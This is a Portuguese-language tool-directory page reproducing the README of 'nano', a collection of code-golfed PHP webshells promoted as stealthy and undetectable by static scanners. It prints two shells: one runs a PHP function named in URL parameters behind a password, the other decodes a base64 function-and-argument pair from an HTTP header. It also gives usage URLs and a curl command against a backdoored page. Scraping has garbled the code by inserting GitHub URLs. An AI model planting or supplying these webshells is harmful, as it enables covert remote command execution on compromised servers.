Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
nano — Nano é uma família de webshells PHP escritas com o mínimo de código possível (code golf) para furtividade. | Kitploit
Ferramentas/GitHubGitHub/s0md3v/nano
Geração de PayloadsShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubs0md3v/nano

nano

Nano é uma família de webshells PHP escritas com o mínimo de código possível (code golf) para furtividade.

Ver Repositório
44991há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

nano

Nano é uma família de webshells PHP que passaram por code golf para serem extremamente furtivos e eficientes.
Coloque-o em watch, talvez; continuarei a enviar mais webshells aqui.

Nano

root@kitploit:~
<?=$_GET[p]==_&&$_GET[f](https://github.com/s0md3v/nano/blob/HEAD/$GET_%5Bc%5D);

Recursos

  • 35 bytes de tamanho
  • Não pode ser detectado por scanners estáticos de código
  • Suporta autenticação

Uso

http://example.com/nano.php?f=function&c=command&p=password

f é para função
c é para comando
p é para senha

Por exemplo, o código abaixo executará o comando ls:

http://example.com/nano.php?f=system&c=ls&p=password

Ninja

root@kitploit:~
<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0](https://github.com/s0md3v/nano/blob/HEAD/$x%5B1%5D);

Recursos

  • 93 bytes de tamanho
  • Totalmente indetectável

Uso

Este é um pouco complexo.
Digamos que você queira executar system(ls), então escreva como system~ls e depois codifique em base64, ou seja, c3lzdGVtKGxzKQ==
Agora adicione qualquer 1 caractere no início. Digamos 'x', então ficará xc3lzdGVtKGxzKQ==
Agora abra seu terminal e digite o seguinte comando
curl -H 'x: xc3lzdGVtKGxzKQ==' http://example.com/backdoored.php
Muito trabalho? Você pode usar o handler em vez disso.

handler

Todo o Resto

Esta é a minha primeira coisa em PHP, então se houver uma maneira melhor de fazer o que fiz, por favor me avise ou abra um pull request.
O projeto nano é licenciado sob a licença MIT, o que basicamente significa que você precisa me dar crédito se quiser redistribuí-lo ou modificá-lo.

Baixar ferramenta